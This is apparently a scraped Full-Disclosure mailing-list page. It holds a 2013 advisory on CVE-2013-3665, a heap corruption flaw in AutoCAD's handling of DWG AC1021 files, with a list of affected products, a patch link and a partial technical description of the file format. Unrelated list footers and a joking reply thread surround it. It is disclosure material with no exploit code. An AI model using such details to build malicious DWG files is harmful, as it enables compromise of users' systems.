mailto:resea...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Robert Q Kim SEO Marketing Advisor Google Page 1 http://sparkah.com/google 2611 S Coast Highway San Diego, CA 92007 310 598 1606 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-3665 - AutoCAD DWG-AC1021 Memory Corruption
Upgrade your autocad or DWG relatred software: Original advisory: http://usa.autodesk.com/adsk/servlet/ps/dl/item?id=21972896linkID=9240618siteID=123112 Title: AutoCAD DWG-AC1021 Heap Corruption Product: Autodesk AutoCAD Advisory ID: BINA-20130724 CVE ID: CVE-2013-3665 Class: Boundary Error Condition (Buffer Overflow) Vulnerability class: Client side/ file format Permalink: http://binamuse.com/advisories/BINA-20130724.txt Vendor notified on: 2013-03-27 Patch/Fix Released: 2013-07-10 Advisory Published: 2013-07-24 Vulnerability Description: AutoCAD is a software for computer-aided design (CAD) and technical drawing in 2D/3D, being one of the world leading CAD design tools. It is developed and sold by Autodesk, Inc. AutoCad is vulnerable to an arbitrary pointer dereference vulnerability, which can be exploited by malicious remote attackers to compromise a user's system. This issue is due to AutoCad's failure to properly bounds-check data in a DWG file before using it to index and copy heap memory values. This can be exploi- ted to execute arbitrary code by opening a specially crafted DWG file, version AC1021. This version was the native fileformat of AutoCAD Release 2007. New versions of the format emerged but AC1021 is still supported in modern AutoCADs for back- ward compatibility. Vulnerable Packages: AutoCAD(R) 2014 AutoCAD(R) 2013 AutoCAD(R) 2012 AutoCAD(R) 2011 AutoCAD(R) Architecture 2014 AutoCAD(R) Architecture 2013 AutoCAD(R) Architecture 2012 AutoCAD(R) Architecture 2011 AutoCAD(R) Civil 3D(R) 2014 AutoCAD(R) Civil 3D(R) 2013 AutoCAD(R) Civil 3D(R) 2012 AutoCAD(R) Civil 3D(R) 2011 AutoCAD(R) ecscad 2014 AutoCAD(R) ecscad 2013 AutoCAD(R) ecscad 2012 AutoCAD(R) ecscad 2011 AutoCAD(R) Electrical 2014 AutoCAD(R) Electrical 2013 AutoCAD(R) Electrical 2012 AutoCAD(R) Electrical 2011 AutoCAD LT(R) 2014 AutoCAD LT(R) 2013 AutoCAD LT(R) 2012 AutoCAD LT(R) 2011 AutoCAD(R) Map 3D 2014 AutoCAD(R) Map 3D 2013 AutoCAD(R) Map 3D 2012 AutoCAD(R) Map 3D 2011 AutoCAD(R) Mechanical 2014 AutoCAD(R) Mechanical 2013 AutoCAD(R) Mechanical 2012 AutoCAD(R) Mechanical 2011 AutoCAD(R) MEP 2014 AutoCAD(R) MEP 2013 AutoCAD(R) MEP 2012 AutoCAD(R) MEP 2011 AutoCAD(R) PID 2014 AutoCAD(R) PID 2013 AutoCAD(R) PID 2012 AutoCAD(R) PID 2011 AutoCAD(R) Plant 3D 2014 AutoCAD(R) Plant 3D 2013 AutoCAD(R) Plant 3D 2012 AutoCAD(R) Plant 3D 2011 AutoCAD(R) Structural Detailing 2014 AutoCAD(R) Structural Detailing 2013 AutoCAD(R) Structural Detailing 2012 AutoCAD(R) Structural Detailing 2011 AutoCAD(R) Utility Design 2014 AutoCAD(R) Utility Design 2012 DWG TrueView(TM) 2014 DWG TrueView(TM) 2013 DWG TrueView(TM) 2012 DWG TrueView(TM) 2011 Not Vulnerable Packages: None Solution/Vendor Information/Workaround: http://images.autodesk.com/adsk/files/CodeExecutionVulnerabilityHotfix.exe Credits: This vulnerability was found by Joshep J. Cortez Sanchez of the Binamuse Vulnerability Research Team, http://binamuse.com Technical Description: The R2007 dwg format is composed by sections and pages. Sections come in two flavors system sections and data sections. The system sections contain informa- tion about where the data sections and their pages are in the file. The system sections are built based in two main data structures: a first header and a second header. In addition, there are two important sections in the file structure, the page map and the section map. Each one of this sections should be decoded using Reed Solomon algorithm and optionally be compressed with a proprietary algorithm (which we will ignore). The file structure looks like this: +--DWG-+ | +-+ +-+ +--+ | | | 1st Header| | Page Map | | Sections Map | | | +--+--+ +-+ +--+ | +--- | + | | Reed Solomon | +V--+ +--| | | | | | | |Header Values | | +---+ | | | | Page Count | +---+ | Decompress +---+ | Header CRC| | | Page Max ID | +---+ | +---+ | | | | | |Second Header | | +---+ |(Compressed) +--+ | Page Map Offset | | | +---+ +---+ | Page Map Len | | Second Header
Re: [Full-disclosure] Top Information Security Consultants to Hire -- WANTED
On Wed, Jul 24, 2013 at 11:40 PM, Gary Baribault g...@baribault.net wrote: On 07/24/2013 06:31 PM, Bob iPhone Kim wrote: OK... guys... I figured out a simple way to organize and get you on the Top 100 Infosec Consultants List You're not too terribly quick are you??? He's a SEO Marketing Advisor and he has a 5 man crackerjack programming team .. I think it must be serious :-) Tweedle -- You will lose an important disk file. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
